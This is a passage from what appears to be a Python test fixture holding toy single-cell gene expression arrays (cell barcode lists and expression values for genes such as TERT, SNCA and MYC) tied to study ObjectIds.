"FoobarAB3_BazMoo_2DBCBBDABAADBDCD-1",
"FoobarAB7_BazMoo_1BABADDCCBAAACBC-1",
"FoobarAB2_BazMoo_6BBDBDACBDBAACBA-1",
"FoobarAB4_BazMoo_1DCDCCCDBDBBABBB-1",
"FoobarAB1_BazMoo_5DADBADCDDCBDAAB-1",
"FoobarAB5_BazMoo_2ACDDDDADBCDDDCA-1",
"FoobarAB4_BazMoo_2DDCCACACDBBACCC-1",
"FoobarAB5_BazMoo_8BACBBADCBDDBDAA-1",
"FoobarAB8_BazMoo_1CBBCDBACADDAABB-1",
"FoobarAB1_BazMoo_8DDCCAABADABCACC-1",
"FoobarAB2_BazMoo_5DBCDDBABCAAADDB-1",
"FoobarAB8_BazMoo_2CADDACABACDAADD-1",
"FoobarAB1_BazMoo_4DDDCDCCABBDDABD-1",
"FoobarAB7_BazMoo_5DCDDDDABACBDACA-1",
"FoobarAB5_BazMoo_2CADBCDABDDCCCBD-1",
"FoobarAB1_BazMoo_2BDDDCADCACDDCBB-1",
"FoobarAB7_BazMoo_3DDCCDCCDDBBAADB-1",
"FoobarAB3_BazMoo_3BBCCDBADBABBDCA-1",
],
"subsample_threshold": None,
"subsample_annotation": None,
"linear_data_type": "Gene",
"study_id": ObjectId("5d276a50421aa9117c982845"),
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
},
"SLC6A4 Expression": {
"name": "SLC6A4 Expression",
"cluster_name": "AB_toy_data_toy.matrix.mtx",
"array_type": "expression",
"array_index": 0,
"values": [
2.81,
2.81,
1.58,
3.0,
2.0,
2.0,
2.58,
3.0,
1.58,
1.0,
1.0,
1.58,
3.0,
2.58,
1.58,
3.0,
3.0,
2.58,
1.0,
2.32,
1.0,
1.58,
2.58,
1.0,
2.81,
1.0,
1.58,
2.81,
3.0,
1.58,
3.0,
2.0,
3.0,
2.32,
2.32,
1.0,
2.58,
2.81,
3.0,
1.58,
1.0,
2.81,
2.0,
2.32,
3.0,
1.58,
2.0,
1.0,
3.0,
1.0,
3.0,
],
"subsample_threshold": None,
"subsample_annotation": None,
"linear_data_type": "Gene",
"study_id": ObjectId("5d276a50421aa9117c982845"),
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
},
"HLA-B Cells": {
"name": "HLA-B Cells",
"cluster_name": "AB_toy_data_toy.matrix.mtx",
"array_type": "cells",
"array_index": 0,
"values": [
"FoobarAB3_BazMoo_6AACDDCDACBCBACD-1",
"FoobarAB6_BazMoo_1ABAADCDCBDDACAB-1",
"FoobarAB3_BazMoo_8ADDBCBACDCCACCD-1",
"FoobarAB6_BazMoo_3BADDCCDACDAAAAD-1",
"FoobarAB7_BazMoo_7AADDADDDCADABDD-1",
"FoobarAB4_BazMoo_3ABCCABBCCCCBCDB-1",
"FoobarAB2_BazMoo_4DDCDADBBCDBAABB-1",
"FoobarAB4_BazMoo_6CADCBCCBCDACDBD-1",
"FoobarAB5_BazMoo_1CACBDACACDDCCDD-1",
"FoobarAB2_BazMoo_3DABAABDAAAABAAB-1",
"FoobarAB1_BazMoo_8CDCBDACDAAACBBD-1",
"FoobarAB8_BazMoo_4CBABCDBBDBCBCCA-1",
"FoobarAB7_BazMoo_3ACBCBCACACDBADD-1",
"FoobarAB8_BazMoo_6BABCBBCDBBCACDD-1",
"FoobarAB7_BazMoo_5CCCBCDAABDBABAD-1",
"FoobarAB1_BazMoo_8DCCDCBDADCCAACD-1",
"FoobarAB7_BazMoo_5CBDCCDBCDBCDCCC-1",
"FoobarAB3_BazMoo_5CAADCDABADACAAC-1",
"FoobarAB4_BazMoo_3BBADCDAABADCAAB-1",
"FoobarAB1_BazMoo_1CDBDADAAACBAABD-1",
"FoobarAB3_BazMoo_3BDBDACADBAADCCC-1",
"FoobarAB6_BazMoo_7BDAABDCAADADBBA-1",
"FoobarAB8_BazMoo_8DCDABCAADDBAABC-1",
"FoobarAB6_BazMoo_4DBCDDCADAACCCDD-1",
"FoobarAB4_BazMoo_1ABABBCCADCADBAB-1",
"FoobarAB1_BazMoo_6ABAAADABDACDDDA-1",
"FoobarAB8_BazMoo_4BDDDDBCBCAABDDD-1",
"FoobarAB7_BazMoo_4DDDDDBCCCBBADBD-1",
"FoobarAB2_BazMoo_1DDDBDCCBCBCACAA-1",
"FoobarAB1_BazMoo_1BCCBCAADCCADCDB-1",
"FoobarAB7_BazMoo_8DCBDADACBABCCCC-1",
"FoobarAB3_BazMoo_5ACABCDCBDAAACAD-1",
"FoobarAB5_BazMoo_7AAABBCDCACCABAB-1",
"FoobarAB3_BazMoo_1DBADBBCAACCBDDC-1",
"FoobarAB2_BazMoo_8DBCDDCCAACDDDCB-1",
"FoobarAB2_BazMoo_4ACDCCACDDBADADC-1",
"FoobarAB6_BazMoo_1BCDADDDABDDBCDA-1",
"FoobarAB4_BazMoo_1BCDCDADBDBCBDAD-1",
"FoobarAB2_BazMoo_1ACCDADBABBACBCA-1",
"FoobarAB7_BazMoo_7ACADCDBAABAACBD-1",
"FoobarAB1_BazMoo_8CBBADABBCDAAAAA-1",
"FoobarAB2_BazMoo_2DABDDCDADBBDDBD-1",
"FoobarAB2_BazMoo_8CCACCBDCBCDABAD-1",
"FoobarAB4_BazMoo_7DDBDCACBACDBAAC-1",
"FoobarAB6_BazMoo_3DBACDBDAAADABDB-1",
"FoobarAB3_BazMoo_4CACCAABBDCDBACD-1",
"FoobarAB6_BazMoo_1BDCADABBAACBCCD-1",
"FoobarAB7_BazMoo_5DBABDCBDCBADBCA-1",
"FoobarAB8_BazMoo_3DACBBDDBABDDDDD-1",
"FoobarAB2_BazMoo_6BBDBDACBDBAACBA-1",
"FoobarAB1_BazMoo_5DADBADCDDCBDAAB-1",
"FoobarAB3_BazMoo_2CACAABACDBCBCBA-1",
"FoobarAB3_BazMoo_2DACDBDCAAAAACBB-1",
"FoobarAB5_BazMoo_6ABBBBCBCBCBBCAB-1",
"FoobarAB7_BazMoo_2BACDBDDBCACABDD-1",
"FoobarAB1_BazMoo_8DDCCAABADABCACC-1",
"FoobarAB7_BazMoo_1CADCBBCDCBDDDDD-1",
"FoobarAB5_BazMoo_7BAACDCDCBCBBACA-1",
"FoobarAB7_BazMoo_5DCDDDDABACBDACA-1",
"FoobarAB2_BazMoo_7DABDADBDBADACDB-1",
"FoobarAB1_BazMoo_2BDDDCADCACDDCBB-1",
"FoobarAB7_BazMoo_7BCABCCCACBAADDC-1",
"FoobarAB8_BazMoo_6BDCBAACCCADDABB-1",
],
"subsample_threshold": None,
"subsample_annotation": None,
"linear_data_type": "Gene",
"study_id": ObjectId("5d276a50421aa9117c982845"),
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
},
"HLA-B Expression": {
"name": "HLA-B Expression",
"cluster_name": "AB_toy_data_toy.matrix.mtx",
"array_type": "expression",
"array_index": 0,
"values": [
1.58,
2.0,
2.32,
2.81,
3.0,
1.0,
3.0,
1.58,
2.0,
1.0,
2.81,
2.58,
2.58,
1.0,
1.58,
2.0,
2.32,
3.0,
2.0,
2.81,
3.0,
2.0,
3.0,
2.81,
1.58,
3.0,
2.0,
2.32,
3.0,
2.0,
3.0,
2.58,
2.0,
2.81,
2.58,
2.32,
1.0,
2.81,
2.58,
2.81,
2.32,
2.81,
3.0,
2.32,
3.0,
2.58,
1.58,
2.0,
3.0,
1.0,
1.0,
2.58,
2.0,
3.0,
2.58,
1.0,
1.58,
2.58,
3.0,
2.32,
2.58,
3.0,
2.0,
],
"subsample_threshold": None,
"subsample_annotation": None,
"linear_data_type": "Gene",
"study_id": ObjectId("5d276a50421aa9117c982845"),
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
},
"TERT Cells": {
"name": "TERT Cells",
"cluster_name": "AB_toy_data_toy.matrix.mtx",
"array_type": "cells",
"array_index": 0,
"values": [
"FoobarAB6_BazMoo_2ACBDBBABABABACC-1",
"FoobarAB3_BazMoo_8BABABDBACACACCD-1",
"FoobarAB7_BazMoo_4DDBADDACABDABDD-1",
"FoobarAB4_BazMoo_3ABCCABBCCCCBCDB-1",
"FoobarAB8_BazMoo_4CDBCDACADDDCABA-1",
"FoobarAB5_BazMoo_8DCCCBAABDDBDDDA-1",
"FoobarAB3_BazMoo_7DCACACACDCADCBD-1",
"FoobarAB3_BazMoo_2DACADABBDACCBDC-1",
"FoobarAB5_BazMoo_3CBDBBABBAACABCD-1",
"FoobarAB5_BazMoo_1CBDCADACACCBCAD-1",
"FoobarAB4_BazMoo_2BBDBCACBADBDDBA-1",
"FoobarAB1_BazMoo_5DDADDBCDDDCDABB-1",
"FoobarAB7_BazMoo_6CBBDBBCBCBDABAA-1",
"FoobarAB8_BazMoo_1CBADADCCCCACAAC-1",
"FoobarAB1_BazMoo_3BCBBBCBCDDCBDAB-1",
"FoobarAB3_BazMoo_7BCABDBCDBABBCBA-1",
"FoobarAB2_BazMoo_4CADDDCAADAADCAB-1",
"FoobarAB5_BazMoo_6AABBDADDABCDDCD-1",
"FoobarAB6_BazMoo_4DBCDDBAAAACAADC-1",
"FoobarAB6_BazMoo_4DBCDDCADAACCCDD-1",
"FoobarAB8_BazMoo_2CACAACCDBBBBBBB-1",
"FoobarAB8_BazMoo_4BDDDDBCBCAABDDD-1",
"FoobarAB3_BazMoo_1DBABCBBAABBABBB-1",
"FoobarAB2_BazMoo_1DDDBDCCBCBCACAA-1",
"FoobarAB7_BazMoo_3ADCADABBCDBBDDC-1",
"FoobarAB1_BazMoo_6BADACADACADCDDD-1",
"FoobarAB1_BazMoo_1DACACBDDADCCACC-1",
"FoobarAB2_BazMoo_1CABCCCACABCCACA-1",
"FoobarAB2_BazMoo_5BCBDBBBDADCBDAC-1",
"FoobarAB4_BazMoo_7DDBDCACBACDBAAC-1",
"FoobarAB3_BazMoo_6BACBCBCDAADDDAC-1",
"FoobarAB5_BazMoo_4BBDDDADCAADDDBB-1",
"FoobarAB8_BazMoo_6DBAADCBDADCCDDB-1",
"FoobarAB3_BazMoo_2DBCBBDABAADBDCD-1",
"FoobarAB3_BazMoo_2DACDBDCAAAAACBB-1",
"FoobarAB4_BazMoo_2DDCCACACDBBACCC-1",
"FoobarAB8_BazMoo_7DADCDCBCDDBDDDA-1",
"FoobarAB1_BazMoo_4CBCCBADBAABDDBB-1",
"FoobarAB2_BazMoo_5ADDADBBABBDCCAC-1",
"FoobarAB1_BazMoo_8CBDADBABACDADAC-1",
"FoobarAB7_BazMoo_1BBADABCABACDADC-1",
"FoobarAB4_BazMoo_1CCACCABBBDABDCB-1",
"FoobarAB3_BazMoo_3DABBDCBDACACCCC-1",
"FoobarAB8_BazMoo_2CADDACABACDAADD-1",
"FoobarAB1_BazMoo_2BDDDCADCACDDCBB-1",
"FoobarAB5_BazMoo_8DDCCCBABCBACABB-1",
"FoobarAB8_BazMoo_5CBCADBCADABBCAB-1",
"FoobarAB3_BazMoo_5DDBDBBBCBDBBBCD-1",
],
"subsample_threshold": None,
"subsample_annotation": None,
"linear_data_type": "Gene",
"study_id": ObjectId("5d276a50421aa9117c982845"),
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
},
"TERT Expression": {
"name": "TERT Expression",
"cluster_name": "AB_toy_data_toy.matrix.mtx",
"array_type": "expression",
"array_index": 0,
"values": [
2.81,
3.0,
2.0,
2.32,
2.81,
2.32,
1.0,
1.0,
2.58,
1.58,
2.81,
2.32,
1.58,
1.58,
1.0,
1.0,
2.81,
1.0,
2.0,
1.58,
2.0,
1.58,
1.58,
2.32,
2.32,
2.32,
3.0,
2.58,
2.0,
3.0,
3.0,
1.58,
2.58,
2.32,
3.0,
1.58,
2.58,
2.0,
1.58,
2.58,
2.0,
2.0,
2.32,
2.32,
2.58,
3.0,
2.32,
3.0,
],
"subsample_threshold": None,
"subsample_annotation": None,
"linear_data_type": "Gene",
"study_id": ObjectId("5d276a50421aa9117c982845"),
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
},
"SNCA Cells": {
"name": "SNCA Cells",
"cluster_name": "AB_toy_data_toy.matrix.mtx",
"array_type": "cells",
"array_index": 0,
"values": [
"FoobarAB8_BazMoo_1BDACCDCCBBADBCB-1",
"FoobarAB2_BazMoo_7DBCCABABACABBBD-1",
"FoobarAB3_BazMoo_8BABABDBACACACCD-1",
"FoobarAB8_BazMoo_8CCBAADAAACCBDAD-1",
"FoobarAB4_BazMoo_3ABCCABBCCCCBCDB-1",
"FoobarAB7_BazMoo_2CADCDBBDBBDDCBA-1",
"FoobarAB5_BazMoo_3CBBBDBACDBABBCA-1",
"FoobarAB7_BazMoo_6ABADABDAABBCDDB-1",
"FoobarAB7_BazMoo_4ABDBBBACBCCBDAA-1",
"FoobarAB6_BazMoo_3CDCABAAADCACCBA-1",
"FoobarAB2_BazMoo_3BBDDCADCDACDABD-1",
"FoobarAB5_BazMoo_4CDCACCCBDBADABB-1",
"FoobarAB8_BazMoo_6BABCBBCDBBCACDD-1",
"FoobarAB8_BazMoo_5CDDADACBAAACBAA-1",
"FoobarAB1_BazMoo_1CDBDADAAACBAABD-1",
"FoobarAB7_BazMoo_4CDBBCDDDDAADCDC-1",
"FoobarAB8_BazMoo_7DDBCBACABDABBAA-1",
"FoobarAB3_BazMoo_1CCCCDBADDDDDAAB-1",
"FoobarAB6_BazMoo_4DACBDDDBDBDCADC-1",
"FoobarAB1_BazMoo_3DBBCDAABDACBCBB-1",
"FoobarAB3_BazMoo_1DBABCBBAABBABBB-1",
"FoobarAB4_BazMoo_8DCDBDACADABCDDB-1",
"FoobarAB4_BazMoo_6DDACDDBBBAADBCC-1",
"FoobarAB3_BazMoo_2CDDCABDDCCACCBA-1",
"FoobarAB7_BazMoo_3ADCADABBCDBBDDC-1",
"FoobarAB5_BazMoo_3BADAABBDABABDAC-1",
"FoobarAB2_BazMoo_1ABCCACACBBBCDBA-1",
"FoobarAB3_BazMoo_2CDDDCADDBDBDABB-1",
"FoobarAB6_BazMoo_2CCACBBAAACCAACA-1",
"FoobarAB1_BazMoo_8CBBADABBCDAAAAA-1",
"FoobarAB5_BazMoo_8BCCCDBABCCADCAB-1",
"FoobarAB7_BazMoo_2BCBBBBCBCAAABDD-1",
"FoobarAB3_BazMoo_5ABDCBBDCDCACABB-1",
"FoobarAB5_BazMoo_1DCBBBBDACADABAA-1",
"FoobarAB2_BazMoo_5BCBDBBBDADCBDAC-1",
"FoobarAB1_BazMoo_3BBCCABDADCDBCCB-1",
"FoobarAB4_BazMoo_7DDBDCACBACDBAAC-1",
"FoobarAB3_BazMoo_4CABACABDCCCADCA-1",
"FoobarAB2_BazMoo_6BBDBDACBDBAACBA-1",
"FoobarAB1_BazMoo_5DADBADCDDCBDAAB-1",
"FoobarAB3_BazMoo_2DACDBDCAAAAACBB-1",
"FoobarAB8_BazMoo_6DADBACAAACBDDAA-1",
"FoobarAB5_BazMoo_6ABBBBCBCBCBBCAB-1",
"FoobarAB5_BazMoo_8BACBBADCBDDBDAA-1",
"FoobarAB1_BazMoo_5AABDACBCCBCABDD-1",
"FoobarAB5_BazMoo_3DDACADDCAADCABB-1",
"FoobarAB6_BazMoo_1DBBAADCDAADBCDC-1",
"FoobarAB1_BazMoo_4DDDCDCCABBDDABD-1",
"FoobarAB7_BazMoo_2ACCDBBADCDCACAB-1",
"FoobarAB3_BazMoo_5DDBDBBBCBDBBBCD-1",
"FoobarAB6_BazMoo_4DAACBADBACABADC-1",
"FoobarAB8_BazMoo_6BDCBAACCCADDABB-1",
"FoobarAB2_BazMoo_3BCDCBCCBCCCCBAC-1",
],
"subsample_threshold": None,
"subsample_annotation": None,
"linear_data_type": "Gene",
"study_id": ObjectId("5d276a50421aa9117c982845"),
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
},
"SNCA Expression": {
"name": "SNCA Expression",
"cluster_name": "AB_toy_data_toy.matrix.mtx",
"array_type": "expression",
"array_index": 0,
"values": [
1.0,
2.81,
2.32,
2.32,
3.0,
2.58,
2.58,
2.81,
3.0,
1.58,
2.58,
2.0,
2.58,
2.0,
2.58,
1.58,
2.81,
2.32,
1.0,
1.0,
1.0,
1.58,
3.0,
2.58,
2.58,
3.0,
2.81,
2.32,
2.58,
1.58,
2.81,
2.0,
3.0,
2.0,
2.0,
2.0,
2.0,
2.32,
2.81,
1.58,
1.58,
1.0,
2.0,
2.81,
2.81,
3.0,
1.0,
2.81,
1.58,
1.0,
2.58,
1.0,
1.58,
],
"subsample_threshold": None,
"subsample_annotation": None,
"linear_data_type": "Gene",
"study_id": ObjectId("5d276a50421aa9117c982845"),
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
},
"CDH1 Cells": {
"name": "CDH1 Cells",
"cluster_name": "AB_toy_data_toy.matrix.mtx",
"array_type": "cells",
"array_index": 0,
"values": [
"FoobarAB3_BazMoo_8BABABDBACACACCD-1",
"FoobarAB1_BazMoo_1BBDDDBDADDCACAB-1",
"FoobarAB7_BazMoo_4ADBADDCDCCADBDC-1",
"FoobarAB8_BazMoo_4BDABCDCCBABACCC-1",
"FoobarAB4_BazMoo_8DBCCDADBCBBCBDD-1",
"FoobarAB2_BazMoo_6ABBADACDCDDBCAC-1",
"FoobarAB7_BazMoo_4DDBADDACABDABDD-1",
"FoobarAB3_BazMoo_1DABABDBDCCDBCBA-1",
"FoobarAB8_BazMoo_4CDBCDACADDDCABA-1",
"FoobarAB5_BazMoo_8DCCCBAABDDBDDDA-1",
"FoobarAB6_BazMoo_1ACCBABCADDCBAAC-1",
"FoobarAB5_BazMoo_3DADDDCACDABCDCB-1",
"FoobarAB5_BazMoo_3CBBBDBACDBABBCA-1",
"FoobarAB2_BazMoo_1AADDCCADACBADAD-1",
"FoobarAB7_BazMoo_5DAACACCCDADACBB-1",
"FoobarAB7_BazMoo_4ABDBBBACBCCBDAA-1",
"FoobarAB4_BazMoo_6CADCBCCBCDACDBD-1",
"FoobarAB5_BazMoo_1CACBDACACDDCCDD-1",
"FoobarAB8_BazMoo_7CCACACCBDDBBCBB-1",
"FoobarAB8_BazMoo_3CCABBAABDCCBDCB-1",
"FoobarAB1_BazMoo_3DCABADBDAADDCBD-1",
"FoobarAB3_BazMoo_3CBBDAAACACCDDDA-1",
"FoobarAB7_BazMoo_5CCCBCDAABDBABAD-1",
"FoobarAB3_BazMoo_5CAADCDABADACAAC-1",
"FoobarAB8_BazMoo_8ADAABACBACDDCAB-1",
"FoobarAB3_BazMoo_5DAAABCBCADBBCCC-1",
"FoobarAB8_BazMoo_8DCDABCAADDBAABC-1",
"FoobarAB4_BazMoo_1ABABBCCADCADBAB-1",
"FoobarAB2_BazMoo_7DCAAACADCCADBAD-1",
"FoobarAB4_BazMoo_6DDACDDBBBAADBCC-1",
"FoobarAB3_BazMoo_2CDDCABDDCCACCBA-1",
"FoobarAB2_BazMoo_4ACDCCACDDBADADC-1",
"FoobarAB5_BazMoo_6BCBABACCCDACDBB-1",
"FoobarAB2_BazMoo_1ACCDADBABBACBCA-1",
"FoobarAB6_BazMoo_2CCACBBAAACCAACA-1",
"FoobarAB7_BazMoo_2BCBBBBCBCAAABDD-1",
"FoobarAB4_BazMoo_6ABCCABADCCDBCAA-1",
"FoobarAB6_BazMoo_1BDCADABBAACBCCD-1",
"FoobarAB7_BazMoo_5DBABDCBDCBADBCA-1",
"FoobarAB4_BazMoo_4CCCDAAACCACABBC-1",
"FoobarAB2_BazMoo_6BBDBDACBDBAACBA-1",
"FoobarAB5_BazMoo_2ACDDDDADBCDDDCA-1",
"FoobarAB8_BazMoo_7DADCDCBCDDBDDDA-1",
"FoobarAB6_BazMoo_6CACDAABBDDBCBDA-1",
"FoobarAB4_BazMoo_7CBDDABDBBDCBDBB-1",
"FoobarAB5_BazMoo_3DDACADDCAADCABB-1",
"FoobarAB7_BazMoo_1CADCBBCDCBDDDDD-1",
"FoobarAB8_BazMoo_2CADDACABACDAADD-1",
"FoobarAB2_BazMoo_1CCCBADCABBDBDAC-1",
"FoobarAB3_BazMoo_8AAABDDBDDCBDDAB-1",
"FoobarAB2_BazMoo_7DABDADBDBADACDB-1",
"FoobarAB7_BazMoo_7BCABCCCACBAADDC-1",
],
"subsample_threshold": None,
"subsample_annotation": None,
"linear_data_type": "Gene",
"study_id": ObjectId("5d276a50421aa9117c982845"),
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
},
"CDH1 Expression": {
"name": "CDH1 Expression",
"cluster_name": "AB_toy_data_toy.matrix.mtx",
"array_type": "expression",
"array_index": 0,
"values": [
2.58,
2.0,
2.81,
2.58,
1.58,
2.81,
1.58,
1.58,
2.58,
1.58,
2.32,
2.58,
2.81,
2.0,
2.32,
2.81,
2.0,
1.0,
1.0,
1.0,
1.0,
1.0,
3.0,
2.0,
1.58,
2.32,
2.0,
2.81,
2.32,
1.0,
2.0,
1.58,
2.81,
1.0,
2.81,
3.0,
3.0,
2.58,
2.58,
2.32,
2.81,
2.0,
2.58,
2.0,
3.0,
2.0,
2.58,
1.58,
2.81,
1.0,
2.58,
2.58,
],
"subsample_threshold": None,
"subsample_annotation": None,
"linear_data_type": "Gene",
"study_id": ObjectId("5d276a50421aa9117c982845"),
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
},
"IGF1 Cells": {
"name": "IGF1 Cells",
"cluster_name": "AB_toy_data_toy.matrix.mtx",
"array_type": "cells",
"array_index": 0,
"values": [
"FoobarAB4_BazMoo_5ABCBACBDABBADAC-1",
"FoobarAB5_BazMoo_4BAABBACBDADDACA-1",
"FoobarAB8_BazMoo_8CCBAADAAACCBDAD-1",
"FoobarAB1_BazMoo_1BBDDDBDADDCACAB-1",
"FoobarAB3_BazMoo_6AACDDCDACBCBACD-1",
"FoobarAB4_BazMoo_8DBCCDADBCBBCBDD-1",
"FoobarAB7_BazMoo_4DDBADDACABDABDD-1",
"FoobarAB6_BazMoo_3BADDCCDACDAAAAD-1",
"FoobarAB7_BazMoo_7AADDADDDCADABDD-1",
"FoobarAB6_BazMoo_1ACCBABCADDCBAAC-1",
"FoobarAB5_BazMoo_3DADDDCACDABCDCB-1",
"FoobarAB2_BazMoo_3BBDDCADCDACDABD-1",
"FoobarAB3_BazMoo_2DACADABBDACCBDC-1",
"FoobarAB1_BazMoo_3DCABADBDAADDCBD-1",
"FoobarAB6_BazMoo_4ACBACBAACAAADAD-1",
"FoobarAB8_BazMoo_3CBCBADCDDBBBABA-1",
"FoobarAB2_BazMoo_2DCDCDBCBABDBBAD-1",
"FoobarAB5_BazMoo_1CBDCADACACCBCAD-1",
"FoobarAB1_BazMoo_3BCBBBCBCDDCBDAB-1",
"FoobarAB6_BazMoo_2CAADBDADABBDCCB-1",
"FoobarAB3_BazMoo_3BDBDACADBAADCCC-1",
"FoobarAB3_BazMoo_5DAAABCBCADBBCCC-1",
"FoobarAB6_BazMoo_4DBCDDCADAACCCDD-1",
"FoobarAB6_BazMoo_4DACBDDDBDBDCADC-1",
"FoobarAB4_BazMoo_4DDBADBCBACBDCDA-1",
"FoobarAB2_BazMoo_1DDDBDCCBCBCACAA-1",
"FoobarAB1_BazMoo_1BCCBCAADCCADCDB-1",
"FoobarAB3_BazMoo_5ACABCDCBDAAACAD-1",
"FoobarAB2_BazMoo_7CDBDADBACBAAAAC-1",
"FoobarAB3_BazMoo_2CDDDCADDBDBDABB-1",
"FoobarAB8_BazMoo_2CCBCCBACABACCAB-1",
"FoobarAB1_BazMoo_8CBBADABBCDAAAAA-1",
"FoobarAB3_BazMoo_5ABDCBBDCDCACABB-1",
"FoobarAB1_BazMoo_3BBCCABDADCDBCCB-1",
"FoobarAB5_BazMoo_4BBDDDADCAADDDBB-1",
"FoobarAB6_BazMoo_1BDCADABBAACBCCD-1",
"FoobarAB5_BazMoo_8CCBBABDDADBBACD-1",
"FoobarAB4_BazMoo_7BADBDDCACBDCCCC-1",
"FoobarAB4_BazMoo_3BCADDCAAACBADBC-1",
"FoobarAB2_BazMoo_6BBDBDACBDBAACBA-1",
"FoobarAB3_BazMoo_2CACAABACDBCBCBA-1",
"FoobarAB2_BazMoo_5ADDADBBABBDCCAC-1",
"FoobarAB8_BazMoo_1CBBCDBACADDAABB-1",
"FoobarAB3_BazMoo_2ADDBAAACCDDDDAA-1",
"FoobarAB1_BazMoo_8CBDADBABACDADAC-1",
"FoobarAB4_BazMoo_2CCACBADCCCCABAD-1",
"FoobarAB2_BazMoo_5DBCDDBABCAAADDB-1",
"FoobarAB5_BazMoo_3DDACADDCAADCABB-1",
"FoobarAB1_BazMoo_2BDDDCADCACDDCBB-1",
"FoobarAB5_BazMoo_1DDDDBBDAADDABCB-1",
"FoobarAB7_BazMoo_7BCABCCCACBAADDC-1",
],
"subsample_threshold": None,
"subsample_annotation": None,
"linear_data_type": "Gene",
"study_id": ObjectId("5d276a50421aa9117c982845"),
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
},
"IGF1 Expression": {
"name": "IGF1 Expression",
"cluster_name": "AB_toy_data_toy.matrix.mtx",
"array_type": "expression",
"array_index": 0,
"values": [
1.58,
2.81,
3.0,
1.0,
2.58,
2.58,
2.81,
1.58,
2.32,
2.81,
1.58,
1.58,
3.0,
2.0,
2.0,
2.58,
2.81,
2.0,
2.81,
2.81,
2.32,
1.58,
2.81,
2.0,
2.58,
1.58,
2.0,
1.0,
2.58,
2.32,
2.58,
1.0,
2.0,
2.32,
2.32,
1.0,
1.58,
2.58,
1.0,
3.0,
2.0,
2.0,
1.58,
3.0,
2.81,
2.32,
2.58,
2.32,
2.81,
2.81,
2.81,
],
"subsample_threshold": None,
"subsample_annotation": None,
"linear_data_type": "Gene",
"study_id": ObjectId("5d276a50421aa9117c982845"),
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
},
"MYC Cells": {
"name": "MYC Cells",
"cluster_name": "AB_toy_data_toy.matrix.mtx",
"array_type": "cells",
"array_index": 0,
"values": [
"FoobarAB4_BazMoo_6ABAADADBBCAABDA-1",
"FoobarAB2_BazMoo_7DBCCABABACABBBD-1",
"FoobarAB8_BazMoo_8CCBAADAAACCBDAD-1",
"FoobarAB3_BazMoo_6AACDDCDACBCBACD-1",
"FoobarAB6_BazMoo_7CBBCDBADBBBABDA-1",
"FoobarAB8_BazMoo_4CDBCDACADDDCABA-1",
"FoobarAB5_BazMoo_1CACBDACACDDCCDD-1",
"FoobarAB6_BazMoo_3CDCABAAADCACCBA-1",
"FoobarAB8_BazMoo_7CCACACCBDDBBCBB-1",
"FoobarAB1_BazMoo_8CDCBDACDAAACBBD-1",
"FoobarAB8_BazMoo_4CBABCDBBDBCBCCA-1",
"FoobarAB8_BazMoo_3CBCBADCDDBBBABA-1",
"FoobarAB8_BazMoo_6CADDCBBACDDBACB-1",
"FoobarAB7_BazMoo_4CDBBCDDDDAADCDC-1",
"FoobarAB8_BazMoo_8ADAABACBACDDCAB-1",
"FoobarAB2_BazMoo_1DDBAACABBACBDCA-1",
"FoobarAB4_BazMoo_1DADCDAADADACBDD-1",
"FoobarAB6_BazMoo_8CBADCCBAAABBCBA-1",
"FoobarAB8_BazMoo_8DCDABCAADDBAABC-1",
"FoobarAB5_BazMoo_5BBDADCDDCCABBDA-1",
"FoobarAB8_BazMoo_2CACAACCDBBBBBBB-1",
"FoobarAB3_BazMoo_7DBDCDADBAAAABCD-1",
"FoobarAB3_BazMoo_1DBABCBBAABBABBB-1",
"FoobarAB1_BazMoo_1BCCBCAADCCADCDB-1",
"FoobarAB4_BazMoo_6DDACDDBBBAADBCC-1",
"FoobarAB3_BazMoo_2CDDCABDDCCACCBA-1",
"FoobarAB6_BazMoo_1BCDADDDABDDBCDA-1",
"FoobarAB2_BazMoo_1ACCDADBABBACBCA-1",
"FoobarAB3_BazMoo_2CDDDCADDBDBDABB-1",
"FoobarAB2_BazMoo_2DABDDCDADBBDDBD-1",
"FoobarAB6_BazMoo_3DBACDBDAAADABDB-1",
"FoobarAB5_BazMoo_4BBDDDADCAADDDBB-1",
"FoobarAB6_BazMoo_1BDCADABBAACBCCD-1",
"FoobarAB5_BazMoo_8CCBBABDDADBBACD-1",
"FoobarAB3_BazMoo_2DBCBBDABAADBDCD-1",
"FoobarAB7_BazMoo_1BABADDCCBAAACBC-1",
"FoobarAB3_BazMoo_4BBBAABCBAACCBAC-1",
"FoobarAB4_BazMoo_5CAADDAABBADCDCD-1",
"FoobarAB5_BazMoo_2ACDDDDADBCDDDCA-1",
"FoobarAB4_BazMoo_2DDCCACACDBBACCC-1",
"FoobarAB8_BazMoo_7DADCDCBCDDBDDDA-1",
"FoobarAB4_BazMoo_2CCACBADCCCCABAD-1",
"FoobarAB5_BazMoo_3DDACADDCAADCABB-1",
"FoobarAB8_BazMoo_2CADDACABACDAADD-1",
"FoobarAB4_BazMoo_3BADBCDDABDDCDAB-1",
"FoobarAB8_BazMoo_7DCADDBDCBABCBCA-1",
"FoobarAB1_BazMoo_2BDDDCADCACDDCBB-1",
"FoobarAB8_BazMoo_5CBCADBCADABBCAB-1",
"FoobarAB8_BazMoo_6BDCBAACCCADDABB-1",
"FoobarAB2_BazMoo_3BCDCBCCBCCCCBAC-1",
],
"subsample_threshold": None,
"subsample_annotation": None,
"linear_data_type": "Gene",
"study_id": ObjectId("5d276a50421aa9117c982845"),
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
},
"MYC Expression": {
"name": "MYC Expression",
"cluster_name": "AB_toy_data_toy.matrix.mtx",
"array_type": "expression",
"array_index": 0,
"values": [
2.0,
1.58,
1.58,
3.0,
1.0,
2.58,
2.0,
2.0,
2.58,
2.32,
1.58,
3.0,
2.58,
1.58,
2.32,
2.32,
2.32,
2.32,
1.0,
1.0,
1.0,
2.58,
2.81,
2.58,
2.0,
2.32,
2.0,
1.58,
1.58,
3.0,
2.81,
1.0,
2.58,
2.58,
2.81,
1.0,
2.32,
2.0,
2.32,
